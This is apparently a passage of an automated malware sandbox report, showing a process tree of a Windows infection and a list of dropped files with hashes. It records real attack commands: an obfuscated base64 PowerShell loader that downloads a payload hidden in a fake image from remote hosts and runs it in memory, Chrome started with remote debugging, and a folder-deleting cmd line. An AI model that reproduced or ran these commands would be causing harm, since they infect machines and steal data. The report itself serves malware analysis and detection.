g@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Cw@I@@k@GI@YQBz@GU@Ng@0@Ew@ZQBu@Gc@d@Bo@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@HQ@ZQB4@HQ@I@@9@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@Ow@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBS@GU@ZgBs@GU@YwB0@Gk@bwBu@C4@QQBz@HM@ZQBt@GI@b@B5@F0@Og@6@Ew@bwBh@GQ@K@@k@GM@bwBt@G0@YQBu@GQ@QgB5@HQ@ZQBz@Ck@Ow@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@EU@bgBj@G8@Z@Bl@GQ@V@Bl@Hg@d@@g@D0@WwBD@G8@bgB2@GU@cgB0@F0@Og@6@FQ@bwBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@QgB5@HQ@ZQBz@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@G0@ZQB0@Gg@bwBk@C@@PQ@g@CQ@d@B5@H@@ZQ@u@Ec@ZQB0@E0@ZQB0@Gg@bwBk@Cg@JwBs@GY@cwBn@GU@Z@Bk@GQ@Z@Bk@GQ@Z@Bh@Cc@KQ@u@Ek@bgB2@G8@awBl@Cg@J@Bu@HU@b@Bs@Cw@I@Bb@G8@YgBq@GU@YwB0@Fs@XQBd@C@@K@@n@HQ@e@B0@C4@cgBT@GE@aQBm@Ek@Yg@v@G8@ZgBu@Gk@LwBn@HI@bw@u@G0@YQBr@HU@cgBl@HM@YQBk@HM@ZQBo@HQ@ZQBi@C8@Lw@6@HM@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string($dosigo.replace('@','A')));powershell.exe $OWjuxD"
                                    6⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:2360
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] ('txt.rSaifIb/ofni/gro.makuresadsehteb//:s', '0', 'StartupName', 'RegAsm', '0'))}}"
                                      7⤵
                                      • Blocklisted process makes network request
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:888
                              • C:\Users\Admin\AppData\Local\Temp\10048360101\uW8i508.exe
                                "C:\Users\Admin\AppData\Local\Temp\10048360101\uW8i508.exe"
                                4⤵
                                • Executes dropped EXE
                                • System Location Discovery: System Language Discovery
                                PID:2408
                              • C:\Users\Admin\AppData\Local\Temp\10048370101\q3na5Mc.exe
                                "C:\Users\Admin\AppData\Local\Temp\10048370101\q3na5Mc.exe"
                                4⤵
                                • Executes dropped EXE
                                • Suspicious use of SetThreadContext
                                • System Location Discovery: System Language Discovery
                                PID:2756
                                • C:\Users\Admin\AppData\Local\Temp\10048370101\q3na5Mc.exe
                                  "C:\Users\Admin\AppData\Local\Temp\10048370101\q3na5Mc.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:2268
                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
                                    6⤵
                                    • Uses browser remote debugging
                                    PID:2124
                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef66d9758,0x7fef66d9768,0x7fef66d9778
                                      7⤵
                                        PID:1504
                                      • C:\Windows\system32\ctfmon.exe
                                        ctfmon.exe
                                        7⤵
                                          PID:1108
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1116 --field-trial-handle=1368,i,11098319280300616177,3042944780442501705,131072 /prefetch:2
                                          7⤵
                                            PID:2852
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1484 --field-trial-handle=1368,i,11098319280300616177,3042944780442501705,131072 /prefetch:8
                                            7⤵
                                              PID:2756
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1584 --field-trial-handle=1368,i,11098319280300616177,3042944780442501705,131072 /prefetch:8
                                              7⤵
                                                PID:888
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2260 --field-trial-handle=1368,i,11098319280300616177,3042944780442501705,131072 /prefetch:1
                                                7⤵
                                                • Uses browser remote debugging
                                                PID:1472
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2288 --field-trial-handle=1368,i,11098319280300616177,3042944780442501705,131072 /prefetch:1
                                                7⤵
                                                • Uses browser remote debugging
                                                PID:680
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c timeout /t 11 & rd /s /q "C:\ProgramData\3opzm" & exit
                                              6⤵
                                                PID:688
                                                • C:\Windows\SysWOW64\timeout.exe
                                                  timeout /t 11
                                                  7⤵
                                                  • Delays execution with timeout.exe
                                                  PID:680
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 2756 -s 500
                                              5⤵
                                              • Program crash
                                              PID:3028
                                          • C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe"
                                            4⤵
                                            • Executes dropped EXE
                                            • Suspicious use of SetThreadContext
                                            • System Location Discovery: System Language Discovery
                                            PID:620
                                            • C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:1972
                                            • C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              PID:996
                                            • C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10048380101\FydOzyQ.exe"
                                              5⤵
                                              • Executes dropped EXE
                                              • System Location Discovery: System Language Discovery
                                              PID:2180
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 620 -s 516
                                              5⤵
                                              • Program crash
                                              PID:2904
                                          • C:\Users\Admin\AppData\Local\Temp\10048390101\FvbuInU.exe
                                            "C:\Users\Admin\AppData\Local\Temp\10048390101\FvbuInU.exe"
                                            4⤵
                                              PID:1796
                                            • C:\Users\Admin\AppData\Local\Temp\10048400101\fbf7ec2863.exe
                                              "C:\Users\Admin\AppData\Local\Temp\10048400101\fbf7ec2863.exe"
                                              4⤵
                                                PID:2536
                                              • C:\Users\Admin\AppData\Local\Temp\10048410101\f075cf0169.exe
                                                "C:\Users\Admin\AppData\Local\Temp\10048410101\f075cf0169.exe"
                                                4⤵
                                                  PID:2168
                                                  • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                    "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                    5⤵
                                                      PID:1524
                                                  • C:\Users\Admin\AppData\Local\Temp\10048420101\ad8e1ac5dc.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\10048420101\ad8e1ac5dc.exe"
                                                    4⤵
                                                      PID:1348
                                                      • C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                        "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"
                                                        5⤵
                                                          PID:1532
                                                      • C:\Users\Admin\AppData\Local\Temp\10048430101\5a52ec5931.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10048430101\5a52ec5931.exe"
                                                        4⤵
                                                          PID:2696
                                                    • C:\Users\Admin\AppData\Local\Temp\1930AEK9487VUI3OHJCPJVUBOA9AKJY.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\1930AEK9487VUI3OHJCPJVUBOA9AKJY.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:2488
                                                      • C:\Users\Admin\Adobe QT32 Server.exe
                                                        "C:\Users\Admin\Adobe QT32 Server.exe"
                                                        3⤵
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:1952
                                                        • C:\Users\Admin\AppData\Roaming\controlupdateFe\Adobe QT32 Server.exe
                                                          "C:\Users\Admin\AppData\Roaming\controlupdateFe\Adobe QT32 Server.exe"
                                                          4⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • Suspicious use of SetThreadContext
                                                          • System Location Discovery: System Language Discovery
                                                          • Suspicious behavior: EnumeratesProcesses
                                                          • Suspicious behavior: MapViewOfSection
                                                          • Suspicious use of WriteProcessMemory
                                                          PID:2676
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            C:\Windows\SysWOW64\cmd.exe
                                                            5⤵
                                                            • Loads dropped DLL
                                                            • Drops file in Windows directory
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious behavior: MapViewOfSection
                                                            PID:1928
                                                            • C:\Users\Admin\AppData\Local\Temp\servicebrowserv5.exe
                                                              C:\Users\Admin\AppData\Local\Temp\servicebrowserv5.exe
                                                              6⤵
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies Control Panel
                                                              PID:1592
                                                    • C:\Users\Admin\AppData\Local\Temp\E6V7H45PAN1EH3X7GR9RR6FBE6G7O.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\E6V7H45PAN1EH3X7GR9RR6FBE6G7O.exe"
                                                      2⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:1900
                                                  • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                    "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                    1⤵
                                                      PID:2800
                                                    • C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
                                                      "C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
                                                      1⤵
                                                        PID:536

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\ProgramData\12CDC90CA74AE0D5.dat

                                                        Filesize

                                                        288KB

                                                        MD5

                                                        b671bdd555b02ee6b2df2e22fbca942e

                                                        SHA1

                                                        90b9a8a8c6f84401e72e9439bf7be295a841865a

                                                        SHA256

                                                        effb4dac6a88936850c896817fe179b21facc3d706e705ad468ac4da2f4f3866

                                                        SHA512

                                                        4c0f4f32302ad2f5d00448f917e2e991f0ff7e0e25934c208f7dcec59fd963737f39d6e3a61c8b961a98b203a22c2fe49a207b8cf8629e16dd3a688a1f92c881

                                                      • C:\ProgramData\578B59DA4D158FC4.dat

                                                        Filesize

                                                        148KB

                                                        MD5

                                                        90a1d4b55edf36fa8b4cc6974ed7d4c4

                                                        SHA1

                                                        aba1b8d0e05421e7df5982899f626211c3c4b5c1

                                                        SHA256

                                                        7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

                                                        SHA512

                                                        ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

                                                      • C:\ProgramData\5fctr\pph47y

                                                        Filesize

                                                        6KB

                                                        MD5

                                                        15eafe91420c00006bb7d078f20a4329

                                                        SHA1

                                                        b39779948590424e33c38f80f56e22d211c7c471

                                                        SHA256

                                                        0d464a791721df06b5767ab4cbe15d5e30407592167380af3a560f16791b389c

                                                        SHA512

                                                        69fe700bcc8621218985ec0e013b97a754bfaa1b4e28fbc48537b2d6b3cf9f2a9d0749eccc6f5f56b4ad422d7dbaa7a7a71af423bacad7fafa2c8022976a89b5

                                                      • C:\ProgramData\67304E4F1F9E1179.dat

                                                        Filesize

                                                        5.0MB

                                                        MD5

                                                        e87d64670a56c2a625658096ae73408f

                                                        SHA1

                                                        9dee648b8d5660e09416e33d66b7d09b3fc3db98

                                                        SHA256

                                                        d3fbdfb580352a821362428d3f90d8fc11dc00afecd1b1bae5bb125de15435e6

                                                        SHA512

                                                        23de58acd9030113477588ac1c55e8cc1011babdf06f0fde1f6cfd51cf65fe33f7774faff028e8c69eae860419c44e326126b7e2960ca68c25687e48236b8138

                                                      • C:\ProgramData\7F71423D137A7A3E.dat

                                                        Filesize

                                                        92KB

                                                        MD5

                                                        2cd7a684788f438d7a7ae3946df2e26f

                                                        SHA1

                                                        3e5a60f38395f3c10d9243ba696468d2bb698a14

                                                        SHA256

                                                        2ebed8dd3531958e857c87ddbf46376b8a10ea2f364d2399d9fcc604da0bee1d

                                                        SHA512

                                                        0fec4b36e2173d1ad5eca880e1be1d0c7093d459aeb612d371e4ac92fbeaea55beb36e9228d36d57fe1851bd4d57b26dd5b8edb4620fb17b91441e840669c7d1

                                                      • C:\ProgramData\801BA711164E755B.dat

                                                        Filesize

                                                        96KB

                                                        MD5

                                                        d367ddfda80fdcf578726bc3b0bc3e3c

                                                        SHA1

                                                        23fcd5e4e0e5e296bee7e5224a8404ecd92cf671

                                                        SHA256

                                                        0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0

                                                        SHA512

                                                        40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

                                                      • C:\ProgramData\A1B84676A71F4F1A.dat

                                                        Filesize

                                                        46KB

                                                        MD5

                                                        02d2c46697e3714e49f46b680b9a6b83

                                                        SHA1

                                                        84f98b56d49f01e9b6b76a4e21accf64fd319140

                                                        SHA256

                                                        522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                                        SHA512

                                                        60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                                                      • C:\ProgramData\C3C38B95A4F2A42B.dat

                                                        Filesize

                                                        224KB

                                                        MD5

                                                        1a4a4fb9b65e38e24e35d7b65936ebf3

                                                        SHA1

                                                        31fac5e20d11c32fa608fc99838786b3ce244373

                                                        SHA256

                                                        25849c62c0299506fd0e1a789b1885ff47476b5bcdfa5ea5cea7f4a397e05593

                                                        SHA512

                                                        d807b7434adf633115d88fe268a358e348d4562f093d702d545bb00ef82b39f1a647042235c8117b4620f757e0322353ca5bf752ef512e83759483596493f7a6

                                                      • C:\ProgramData\EAD7069F6FDDC282.dat

                                                        Filesize

                                                        20KB

                                                        MD5

                                                        c9ff7748d8fcef4cf84a5501e996a641

                                                        SHA1

                                                        02867e5010f62f97ebb0cfb32cb3ede9449fe0c9

                                                        SHA256

                                                        4d3f3194cb1133437aa69bb880c8cbb55ddf06ff61a88ca6c3f1bbfbfd35d988

                                                        SHA512

                                                        d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

                                                      • C:\Users\Admin:.repos

                                                        Filesize

                                                        1.2MB

                                                        MD5

                                                        1790542db73e85b6e4784eb4b69671c7

                                                        SHA1

                                                        0da66caa492a1fbede60745d9ee636428a723b97

                                                        SHA256

                                                        59c480c0dc8be4d38e1f1523097f32f6e7a4ee8595dda96050724a28f69c1b15

                                                        SHA512

                                                        55e4167c8efcc3e9c85a54f486ac8b420d24b9f0b1d52ef2661c839f3311e4aeddbfaafac63a3c12e5a34f164c9d756f0520f6aa2da248f39a76ab6dcaf782f4

                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

                                                        Filesize

                                                        71KB

                                                        MD5

                                                        83142242e97b8953c386f988aa694e4a

                                                        SHA1

                                                        833ed12fc15b356136dcdd27c61a50f59c5c7d50

                                                        SHA256

                                                        d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755

                                                        SHA512

                                                        bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat

                                                        Filesize

                                                        40B

                                                        MD5

                                                        a5ff7b8d3f9da95f3edc95416ad0ee3a

                                                        SHA1

                                                        a1d3fb57133e5369e14db282af76e1c6593cc9b2

                                                        SHA256

                                                        7237c8d0f62cf771e73c5e6099e0ff332f3bd57474348b304390afb190f9fcfd

                                                        SHA512

                                                        d0ac399fbcf673e3045e62b5bdeee954cf08fe562f2aba8c718980b504e00af2cb3c14ee28c719fc46058cb9ede922f373f2d53e585e29c4d7e1d2eecea2898e

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\000009.dbtmp

                                                        Filesize

                                                        16B

                                                        MD5

                                                        979c29c2917bed63ccf520ece1d18cda

                                                        SHA1

                                                        65cd81cdce0be04c74222b54d0881d3fdfe4736c

                                                        SHA256

                                                        b3524365a633ee6d1fa9953638d2867946c515218c497a5ec2dbef7dc44a7c53

                                                        SHA512

                                                        e38f694fd6ab9f678ae156528230d7a8bfb7b59a13b227f59f9c38ab5617db11ebb6be1276323a905d09c4066a3fe820cf58077ab48bf201f3c467a98516ee7a

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

                                                        Filesize

                                                        264KB

                                                        MD5

                                                        f50f89a0a91564d0b8a211f8921aa7de

                                                        SHA1

                                                        112403a17dd69d5b9018b8cede023cb3b54eab7d

                                                        SHA256

                                                        b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec

                                                        SHA512

                                                        bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\000010.dbtmp

                                                        Filesize

                                                        16B

                                                        MD5

                                                        60e3f691077715586b918375dd23c6b0

                                                        SHA1

                                                        476d3eab15649c40c6aebfb6ac2366db50283d1b

                                                        SHA256

                                                        e91d13722e31f9b06c5df3582cad1ea5b73547ce3dc08b12ed461f095aad48ee

                                                        SHA512

                                                        d1c146d27bbf19362d6571e2865bb472ce4fe43dc535305615d92d6a2366f98533747a8a70a578d1f00199f716a61ce39fac5cab9dd67e9c044bc49e7343130e

                                                      • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\000007.dbtmp

                                                        Filesize

                                                        16B

                                                        MD5

                                                        18e723571b00fb1694a3bad6c78e4054

                                                        SHA1

                                                        afcc0ef32d46fe59e0483f9a3c891d3034d12f32

                                                        SHA256

                                                        8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa

                                                        SHA512

                                                        43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\service[1].htm

                                                        Filesize

                                                        1B

                                                        MD5

                                                        cfcd208495d565ef66e7dff9f98764da

                                                        SHA1

                                                        b6589fc6ab0dc82cf12099d1c2d40ab994e8410c

                                                        SHA256

                                                        5feceb66ffc86f38d952786c6d696c79c2dbc239dd4e91b46729d73a27fb57e9

                                                        SHA512

                                                        31bca02094eb78126a517b206a88c73cfa9ec6f704c7030d18212cace820f025f00bf0ea68dbf3f3a5436ca63b53bf7bf80ad8d5de7d8359d0b7fed9dbc3ab99

                                                      • C:\Users\Admin\AppData\Local\Temp\10041290101\mAtJWNv.exe

                                                        Filesize

                                                        350KB

                                                        MD5

                                                        b60779fb424958088a559fdfd6f535c2

                                                        SHA1

                                                        bcea427b20d2f55c6372772668c1d6818c7328c9

                                                        SHA256

                                                        098c4fe0de1df5b46cf4c825e8eba1893138c751968fcf9fe009a6991e9b1221

                                                        SHA512

                                                        c17a7781790326579669c2b9ad6f7f9764cf51f44ad11642d268b077ade186563ae53fc5e6e84eb7f563021db00bef9ebd65a8d3fbe7a73e85f70a4caa7d8a7f

                                                      • C:\Users\Admin\AppData\Local\Temp\10042390101\uW8i508.exe

                                                        Filesize

                                                        6.8MB

                                                        MD5

                                                        dab2bc3868e73dd0aab2a5b4853d9583

                                                        SHA1

                                                        3dadfc676570fc26fc2406d948f7a6d4834a6e2c

                                                        SHA256

                                                        388bd0f4fe9fca2897b29caac38e869905fd7d43c1512ca3fb9b772fbf2584eb

                                                        SHA512

                                                        3aefebe985050dbbd196e20e7783ada4c74a57fb167040323390c35a5c7b0185cb865591bf77096ff2bb5269c4faa62c70f6c18fc633851efa3c7f8eefe1ceb8

                                                      • C:\Users\Admin\AppData\Local\Temp\10043470101\FydOzyQ.exe

                                                        Filesize

                                                        532KB

                                                        MD5

                                                        231c20b0fbf247fb166c6c0ef7bb268d

                                                        SHA1

                                                        a7d5d46ece3fe59238b9df17d230c2e0354f9773

                                                        SHA256

                                                        3743b3270450dad9fbf2b4a16fdd7fe4a3d1d171720ea738401e467205041f80

                                                        SHA512

                                                        9382a6359d777ff8c0877a47204acb149f96f9fe40f0514ad1ea98374a1a9173f5b2b2918db3eba095f59548cec3fa704c06c40f246ae6dd3c4e8d20d27523d1

                                                      • C:\Users\Admin\AppData\Local\Temp\10045640101\FvbuInU.exe

                                                        Filesize

                                                        1.8MB

                                                        MD5

                                                        9dadf2f796cd4500647ab74f072fd519

                                                        SHA1

                                                        92b6c95a6ed1e120488bd28ac74274e874f6e740

                                                        SHA256

                                                        e5f73330a51f34981205988aa6bbd82797a8d2d1e2ef1a605aa90baa3a806d76

                                                        SHA512

                                                        fd9f14321805f6bfef8fa2c81e11c5c96a7246acbc70fb9c86e6a59d9e650353231ddca0c30d3c0db69cbee1c219c5ca416a6f9f691edeebbec114e997fc574d

                                                      • C:\Users\Admin\AppData\Local\Temp\10046200141\ISPWgd6.ps1

                                                        Filesize

                                                        27KB

                                                        MD5

                                                        54238273f549f59cd28aedfe98fb32e5

                                                        SHA1

                                                        ca0359ac91df20c4f3e4958c1c56bb8067405178

                                                        SHA256

                                                        3009e864d40d67f803481fd7f4f8a38f46eb5dbf0c9a0b6922c11c2121ec50c6

                                                        SHA512

                                                        107238669dfb0b776021205d5b62f290180f6923120811020a6fc7e90efb3fa3ff6868a74cb320cda0cdd287b334b32257f0568906288114725a2e61203f4232

                                                      • C:\Users\Admin\AppData\Local\Temp\10047700101\016789654f.exe

                                                        Filesize

                                                        938KB

                                                        MD5

                                                        439917d79449af131757cea299fb4498

                                                        SHA1

                                                        f20ae27932ba3caa372b9118762bab544ece65b3

                                                        SHA256

                                                        e760ca80d69a4f53bf620df6ff57555fb4dd65a5e61b46cc952f7e3f76d61a09

                                                        SHA512

                                                        2c98ee1221dc32acedb190431f34b72fb5ec050adac7e72cd80a744cc612c26836ed33080f30cc30ca514813e64c6e8c8cebd37563bce608abc2675e13a20369

                                                      • C:\Users\Admin\AppData\Local\Temp\10047710121\am_no.cmd

                                                        Filesize

                                                        2KB

                                                        MD5

                                                        189e4eefd73896e80f64b8ef8f73fef0

                                                        SHA1

                                                        efab18a8e2a33593049775958b05b95b0bb7d8e4

                                                        SHA256

                                                        598651a10ff90d816292fba6e1a55cf9fb7bb717f3569b45f22a760849d24396

                                                        SHA512

